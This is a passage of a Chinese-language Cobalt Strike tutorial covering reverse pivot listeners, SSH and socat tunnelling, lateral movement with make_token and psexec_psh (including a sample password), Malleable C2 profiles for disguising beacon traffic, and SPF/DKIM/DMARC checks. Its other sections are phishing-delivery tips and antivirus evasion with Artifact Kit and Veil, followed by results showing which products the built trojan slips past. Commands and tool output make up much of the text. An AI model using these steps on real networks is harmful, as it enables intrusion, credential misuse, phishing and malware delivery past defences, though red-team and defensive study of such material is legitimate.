</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><h2 id="_2、反向转发">2、反向转发 <a href="#_2、反向转发" class="header-anchor">#</a></h2> <p>反向转发顾名思义就是和<a href="https://teamssix.com/year/200419-150644.html" target="_blank" rel="noopener noreferrer">上一节<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a>中提到的转发路径相反，之前我们设置的代理是 <code>CS服务端 --&gt; 上线主机 --&gt; 内网主机</code>，反向转发则是 <code>内网主机 --&gt; 上线主机 --&gt; CS服务端</code>。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-1.png" alt=""></p> <p>继续使用上面的演示环境，首先右击上线主机会话，选择 <code>Pivoting --&gt; Listener</code> ，除了 Name 选项之外，CS 都会自动配置好，这里直接使用默认的配置信息。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-2.png" alt=""></p> <p>之后生成一个 Windows 可执行文件，选择上一步生成的监听器，如果目标是 64 位则勾选使用 x64 Payload 的选项。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-3.png" alt=""></p> <p>之后将该可执行文件在目标主机上执行即可，在现实环境中可以尝试使用钓鱼邮件的方式诱导目标执行。</p> <p>当目标执行该文件后，就会发现当前不出网的 192.168.232.132 主机已经上线了。</p> <p><img 
src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs21-4.png" alt=""></p> <p>有一说一，关于这部分网上大部分教程还是 CS 3.x 版本的教程，而在 4.0 的操作中个人感觉要方便很多。</p> <p>网上关于这部分内容的 CS 4.0 的教程真的是少之又少，一开始在参考 3.x 教程的时候踩了很多坑，最后终于某内部知识库发现了一篇关于这部分内容的 4.0 教程，在该教程的参考下才发现居然如此简单。</p> <h2 id="_3、通过-ssh-开通通道">3、通过 SSH 开通通道 <a href="#_3、通过-ssh-开通通道" class="header-anchor">#</a></h2> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-1.png" alt=""></p> <p>1、连接到上图中蓝色区域里的 PIVOT 主机并开启端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>ssh -D 1080 user@&lt;blue pivot&gt;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>该命令中的 -D 参数即动态端口转发：SSH 会在本地 1080 端口监听一个 SOCKS 代理，凡是发往该端口的连接都会经 SSH 隧道转发到远程主机，再由远程主机代为访问目标。</p></blockquote> <p>2、在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:&lt;target&gt;:445
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p>socat 可以理解成 netcat 的加强版。socat 建立 socks 连接默认端口就是 1080 ，由于我们上面设置的就是 1080，因此这里不需变动。如果设置了其他端口，那么这里还需要在命令最后加上 <code>,socksport=&lt;port&gt;</code> 指定端口才行。</p></blockquote> <p>3、在攻击者控制的主机上运行 beacon，使其上线</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>注意需要使用 administrator 权限运行 beacon
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>4、在上线的主机上运行以下命令</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>make_token [DOMAIN\user] [password]
jump psexec_psh &lt;red pivot&gt; [listener]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>整体的流程就是下面这张图一样。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-2.png" alt=""></p> <p><strong>演示</strong></p> <p>我在本地搭建了这样的一个环境。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-3.png" alt=""></p> <ol><li>首先使 Win1 主机上线，接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。</li></ol> <div class="language- line-numbers-mode"><pre class="language-text"><code>ssh -D 1080 user@192.168.175.146
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>&gt; ssh <span class="token operator">-</span>D 1080 user@192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>146
user@192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>146's password: 
Last login: Fri Jul 31 20:00:54 2020 <span class="token keyword">from</span> 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>1
user@ubuntu:~$ 
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p>2、在 Linux1 主机上开启 445 端口转发</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>3、在 Win1 主机上运行以下命令使 Win2 上线</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>make_token teamssix\administrator Test123!
jump psexec_psh 192.168.175.200 smb
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code>beacon&gt; make_token teamssix\administrator Test123<span class="token operator">!</span>
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to create a token <span class="token keyword">for</span> teamssix\administrator
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 61 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> Impersonated WINTEST\Administrator

beacon&gt; jump psexec_psh 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200 smb
<span class="token punctuation">[</span><span class="token operator">*</span><span class="token punctuation">]</span> Tasked beacon to run windows<span class="token operator">/</span>beacon_bind_pipe <span class="token punctuation">(</span>\\<span class="token punctuation">.</span>\pipe\msagent_532c<span class="token punctuation">)</span> on 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200 via Service Control Manager <span class="token punctuation">(</span>PSH<span class="token punctuation">)</span>
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 5886 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> received output:
Started service 4aea3b9 on 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>175<span class="token punctuation">.</span>200
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> host called home<span class="token punctuation">,</span> sent: 204473 bytes
<span class="token punctuation">[</span><span class="token operator">+</span><span class="token punctuation">]</span> established link to child beacon: 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>232<span class="token punctuation">.</span>132
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br></div></div><p>4、随后便可以看到通过 SSH 上线的主机</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs22-4.png" alt=""></p> <h1 id="_0x08-malleable-c2">0x08 Malleable C2 <a href="#_0x08-malleable-c2" class="header-anchor">#</a></h1> <h2 id="_1、malleable-命令和控制">1、Malleable 命令和控制 <a href="#_1、malleable-命令和控制" class="header-anchor">#</a></h2> <p>Malleable 是一种针对特定领域的语言，主要用来控制 Cobalt Strike Beacon</p> <p>在开启 teamserver 时，在其命令后指定配置文件即可调用，比如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./teamserver [ip address] [password] [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="_2、设置和使用">2、设置和使用 <a href="#_2、设置和使用" class="header-anchor">#</a></h2> <p><strong>定义事务指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>http-get {
	# 指标
}
http-post {
	# 指标
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><strong>控制客户端和服务端指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>http-get {
	client {
		# 指标
	}
	server {
		# 指标
	}
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>set  操作</strong></p> <p>set 语句是给一个选项赋值的方法，以分号结束。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>set useragent &quot;Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1)&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>malleable 给了我们很多选项，比如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>jitter		# 控制 beacon 默认回连的抖动因子
maxdns		# 控制最大 DNS 请求，限制最大数量可以使 DNS Beacon 发送数据看起来正常些
sleeptime	# 控制 beacon 的全部睡眠时间
spawnto
uri
useragent	# 控制每次发送请求的 useragent
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><code>sleeptime</code> 和 <code>jitter</code> 两个选项是很重要的</p> <p><strong>添加任意 headers</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>header &quot;Accept&quot; &quot;text/html,application/xhtml&quot;;
header &quot;Referer&quot; &quot;https://www.google.com&quot;;
header &quot;Progma&quot; &quot;no-cache&quot;;
header &quot;Cache-Control&quot; &quot;no-cache&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>其他指标</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>header &quot;header&quot; &quot;value&quot;;
parameter &quot;key&quot; &quot;value&quot;;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>转换/存储数据</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>metadata {
    netbios;
    append &quot;-.jpg&quot;;
    uri-append;
}
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs23-1.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs23-2.png" alt=""></p> <h2 id="_3、配置语言">3、配置语言 <a href="#_3、配置语言" class="header-anchor">#</a></h2> <div class="language- line-numbers-mode"><pre class="language-text"><code>append &quot;string&quot;
base64
netbios
netbiosu
prepend &quot;string&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h2 id="_4、测试配置文件">4、测试配置文件 <a href="#_4、测试配置文件" class="header-anchor">#</a></h2> <p>在GitHub 上有一些配置文件的示例，项目地址：<a href="https://github.com/rsmudge/Malleable-C2-Profiles" target="_blank" rel="noopener noreferrer">https://github.com/rsmudge/Malleable-C2-Profiles<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>这一节将使用该项目中的 <code>Malleable-C2-Profiles/APT/havex.profile</code> 配置文件作为示例。</p> <p><strong>测试配置文件是否有效</strong></p> <p>可以使用 c2lint 工具对配置文件进行测试，以判断配置文件编写的是否有效。</p> <p>来到 cobalt strike 目录下，可以看到有一个 c2lint 文件，该文件需要在 Linux 下运行。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./c2lint [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>在运行的结果中，绿色正常（这里更像青色），黄色告警，红色错误，比如运行 <code>Malleable-C2-Profiles</code> 项目里的 <code>havex.profile</code> 文件。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./c2lint ./Malleable-C2-Profiles/APT/havex.profile
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-1.png" alt=""></p> <p>当配置文件存在错误的时候，就会以红色显示出来</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-2.png" alt=""></p> <p><strong>运行 teamserver</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./teamserver [teamserver_ip] [teamserver_password] [profile]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; ./teamserver 192.168.12.2 password ./Malleable-C2-Profiles/APT/havex.profile
[*] Will use existing X509 certificate and keystore (for SSL)
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] I see you're into threat replication. ./Malleable-C2-Profiles/APT/havex.profile loaded.
[+] Team server is up on 50050
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>这里调用的 havex.profile 配置文件，该配置文件里对 cookie 进行了 base64 编码。</p> <p>开启 cobalt strike 后，使主机上线，通过 wireshark 抓包可以发现数据包确实符合这些特征。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs24-3.png" alt=""></p> <p>关于 Malleable C2 文件的使用，这里只是大概记录了一些，想了解更多关于 Malleable C2 文件的内容或者注意事项等，可以参考 A-TEAM 团队的 CS 4.0 用户手册。</p> <h1 id="_0x09-免杀">0x09 免杀 <a href="#_0x09-免杀" class="header-anchor">#</a></h1> <p>Cobalt Strike 不是什么工作情况都能胜任的工具，因此就需要我们根据不同的情况去做一些辅助工作。</p> <h2 id="_1、dkim、spf-和-dmarc">1、DKIM、SPF 和 DMARC <a href="#_1、dkim、spf-和-dmarc" class="header-anchor">#</a></h2> <p>SPF、DKIM、DMARC 都是邮件用于帮助识别垃圾信息的附加组件，那么作为一个攻击者，在发送钓鱼邮件的时候，就需要使自己的邮件能够满足这些组件的标准，或者发送到未配置这些组件的域。</p> <p>在理解这些防御标准前，需要先理解如何在因特网上通过 SMTP 发送邮件。</p> <p><strong>SMTP</strong></p> <p>发送一封邮件的过程大概是下面这个样子，这里以QQ邮箱为例。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; telnet smtp.qq.com 25
HELO teamssix
auth login
base64编码后的邮箱名
base64编码后的授权码
MAIL FROM: &lt;evil_teamssix@qq.com&gt;
RCPT TO: &lt;target_teamssix@qq.com&gt;
DATA
邮件内容
.
QUIT
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>防御策略</strong></p> <h3 id="dkim">DKIM <a href="#dkim" class="header-anchor">#</a></h3> <p>DKIM <code>DomainKeys Identified Mail</code> 域名密钥识别邮件，DKIM 是一种防范电子邮件欺诈的验证技术，通过对邮件头和正文进行数字签名的方式对邮件发送域名进行验证。</p> <p>邮件接收方接收邮件时，会通过 DNS 查询获得发送域公布的公钥，验证邮件 DKIM 签名的有效性，从而判断邮件是否确实来自该域且在传输过程中未被篡改。</p> <h3 id="spf">SPF <a href="#spf" class="header-anchor">#</a></h3> <p>SPF <code>Sender Policy Framework</code> 发送人策略框架，SPF 主要用来防止随意伪造发件人。其做法就是设置一个 SPF 记录，SPF 记录实际上就是 DNS 的 TXT 记录。</p> <p>如果邮件服务器收到一封来自 IP 不在 SPF 记录里的邮件，则会按照记录末尾的策略处理：<code>-all</code>（硬失败）通常直接退信，<code>~all</code>（软失败）通常标记为垃圾邮件。</p> <p>我们可以使用以下命令查看目标的 SPF 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>dig +short TXT target.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT qq.com
&quot;v=spf1 include:spf.mail.qq.com -all&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>上面的 <code>include:spf.mail.qq.com</code> 表示引入<code>spf.mail.qq.com</code>域名下的 SPF 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT spf-a.mail.qq.com
&quot;v=spf1 ip4:203.205.251.0/24 ip4:103.7.29.0/24 ip4:59.36.129.0/24 ip4:113.108.23.0/24 ip4:113.108.11.0/24 ip4:119.147.193.0/24 ip4:119.147.194.0/24 ip4:59.78.209.0/24 ip4:113.96.223.0/24 ip4:183.3.226.0/24 ip4:183.3.255.0/24 ip4:59.36.132.0/24 -all&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>上面的 <code>ip4:203.205.251.0/24 ip4:103.7.29.0/24</code> 表示只允许这些网段内的 IP 以该域名发送邮件，末尾的 <code>-all</code> 表示其余来源一律拒绝。</p> <h3 id="dmarc">DMARC <a href="#dmarc" class="header-anchor">#</a></h3> <p>DMARC <code>Domain-based Message Authentication, Reporting &amp; Conformance</code> 基于域的消息认证，报告和一致性。</p> <p>它用来检查一封电子邮件是否来自所声称的发送者。DMARC 建立在 SPF 和 DKIM 协议上，并且添加了域名对齐检查和报告发送功能，从而更好地保护域名不被用于钓鱼攻击。</p> <p>可以使用下面的命令查看目标的 DMARC 记录。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>dig +short TXT _dmarc.target.com
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language- line-numbers-mode"><pre class="language-text"><code>&gt; dig +short TXT _dmarc.qq.com
&quot;v=DMARC1; p=none; rua=mailto:mailauth-reports@qq.com&quot;
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>也有一些在线网站支持检测 SPF、DKIM、DMARC 的记录，比如 <a href="https://dmarcly.com/tools/" target="_blank" rel="noopener noreferrer">https://dmarcly.com/tools/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>关于这些记录查询返回结果的解释可参考文章末的参考链接。</p> <p><strong>发送钓鱼邮件的一些注意事项</strong></p> <p>1、检测目标是否有 SPF 记录，如果有则可能会被拦截</p> <p>2、检测目标 DMARC 记录的 p 选项是否为 reject ，如果有则可能会被拒绝</p> <p>3、模板中嵌入的 URL 地址，不要使用 IP 地址，要保证使用完整的 URL地址</p> <p>4、邮件的附件中不能附上一些可执行文件，比如 exe 格式的文件，因为一些邮件过滤器可能会将这些可执行文件删除</p> <h2 id="_2、杀毒软件">2、杀毒软件 <a href="#_2、杀毒软件" class="header-anchor">#</a></h2> <p>这一节将来看看杀毒软件相关的概念，毕竟知己知彼才能百战不殆，最后会介绍一下常见的免杀方法。</p> <p>常规杀毒软件的目的就是发现已知病毒并中止删除它，而作为攻击者则需要对病毒文件进行免杀处理，从而使杀毒软件认为我们的文件是合法文件。</p> <p><strong>杀软受到的限制</strong></p> <p>1、杀毒软件不能把可疑文件删除或者结束运行，否则用户的正常操作可能就会受到影响，同时也会对杀毒软件公司的声誉、口碑产生影响。</p> <p>2、杀毒软件不能占用太多的系统资源，否则用户可能会考虑卸载杀毒软件。</p> <p>3、大多数杀毒软件的一个弱点就是只会在浏览器下载文件或者文件被写入磁盘时才会检查这个文件的特征码，也就是说在这种情况下才会检查文件是否是病毒。</p> <p><strong>如何工作</strong></p> <p>1、在大多数杀毒软件背后都会有一个已知病毒的签名数据库，通过将当前文件的特征码与病毒签名数据库进行比对，如果一致则说明该文件是病毒。</p> <p>2、同时一些杀毒软件也会去发现用户的一些可疑行为，而且杀毒软件对这种可疑行为的判定会下比较大的功夫。因为如果误杀，造成的后果可能对用户来说是比较严重的。</p> <p>3、一些杀毒软件会在沙箱环境中去运行可疑文件，然后根据该可疑文件的行为判断是否为病毒。</p> <h3 id="如何免杀">如何免杀 <a href="#如何免杀" class="header-anchor">#</a></h3> <p>首先要判断目标使用了哪款杀毒软件，然后自己在虚拟机中去尝试绕过它。</p> <p>其次可以使用 Cobalt Strike 的 Artifact Kit 组件制作免杀可执行文件。Artifact Kit 是一个制作免杀 EXE、DLL 和 Service EXE 的源代码框架，在 Cobalt Strike 的 <code>Help --&gt; 
Arsenal</code> 处可下载 Artifact Kit。</p> <p>Artifact Kit 的工作原理大概如下：</p> <p>1、将病毒文件进行混淆处理，使杀毒软件将其判定为可疑文件而不是病毒文件。这种混淆可以逃避那些使用简单字符串搜索来识别恶意代码的杀毒软件。</p> <p>2、对病毒文件进行一些处理，以绕过沙箱检测。比如 Artifact Kit 中的 src-common/bypass-pipe.c 会生成可执行文件和DLL，它们通过命名管道为自己提供shellcode。如果防病毒沙箱不能模拟命名管道，它将找不到已知的恶意 shellcode。</p> <p>Artifact Kit 的使用步骤大概如下：</p> <p>1、下载 Artifact Kit</p> <p>2、如果需要的话就修改/混淆病毒文件</p> <p>3、构建</p> <p>4、使用 Artifact Kit 加载脚本</p> <h3 id="artifact-kit">Artifact Kit <a href="#artifact-kit" class="header-anchor">#</a></h3> <p>首先来看看未进行免杀处理的效果，这里采用 <a href="https://www.virustotal.com" target="_blank" rel="noopener noreferrer">virustotal<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a> 进行检测，发现被 42 个引擎检测到。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-6.png" alt=""></p> <p>接下来就试试 Artifact Kit 进行免杀的效果，有条件的可以去官网下载支持一下正版。</p> <p>当然 Github 上也有人上传了，项目地址：<a href="https://github.com/Cliov/Arsenal" target="_blank" rel="noopener noreferrer">https://github.com/Cliov/Arsenal<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>这里使用 Artifact Kit 
中的 dist-peek 方法进行测试。</p> <p>来到 Cobalt Strike 下打开 <code>Cobalt Strike -&gt; Script Manager</code>，Load 加载 <code>/Arsenal/artifact/dist-peek/artifact.cna</code> 插件，之后在 <code>Attacks -&gt; Packages -&gt; Windows Executable</code> 中生成木马文件。</p> <p>使用 VT 检测发现仅有 8 个引擎检测到，感觉效果好像还行。</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-9.png" alt=""></p> <p>把每个杀软的病毒库升级到最新后，实测可以过腾讯电脑管家、火绒，但 360 安全卫士 、 360 杀毒不行。</p> <blockquote><p>说句题外话，至于为什么用了两款 360 的产品，主要就是为了截图好看些。</p></blockquote> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-10.png" alt=""></p> <h3 id="veil-evasion">Veil Evasion <a href="#veil-evasion" class="header-anchor">#</a></h3> <p>此外，也可以使用 Veil Evasion 框架，Veil Evasion 的安装也是比较简单的，Veil-Evasion 在 Kali 2020以前是自带的，但 Kali 2020 中是需要独立安装的。在 Kali 中可以直接使用 apt-get 进行安装。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>git config --global http.proxy 'socks5://127.0.0.1:1080'
git config --global https.proxy 'socks5://127.0.0.1:1080'

apt-get install veil-evasion
veil
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>其他系统可以使用 veil-evasion 项目中的介绍进行安装，项目地址：<a href="https://github.com/Veil-Framework/Veil-Evasion" target="_blank" rel="noopener noreferrer">https://github.com/Veil-Framework/Veil-Evasion<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p>由于 Veil Evasion 有 200 多 M ，因此建议挂上代理进行下载安装。</p> <p>安装完成之后，在 Cobalt Strike 里的 <code>Attacks -&gt; Packages -&gt; Payload Generator</code>  中选择 Veil 输出生成一个 payload.txt 文件</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs25-1.png" alt=""></p> <p>随后来到 Kali 下，输入 <code>veil</code> 启动，输入 <code>use Evasion</code> 使用 Evasion 工具，<code>list</code> 查看当前可用的 Payload</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>veil
use Evasion
list
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p>这里使用第 17 个即 <code>go/shellcode_inject/virtual.py</code> Payload 作为示例（编号随 Veil 版本变化，以 <code>list</code> 的实际输出为准），因为 go、c 等编译型语言相对于 python 等脚本语言来说免杀效果会好些。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use 17
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>之后输入 <code>generate</code>，选择第三项 <code>Custom shellcode string</code> ，粘贴刚生成的 payload.txt 文本内容，输入要生成的 exe 文件名，即可生成一个 exe 木马文件（实际免杀效果见下文测试结果）。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>generate
3
粘贴 payload.txt 内容
bypass_go	#生成文件的名称
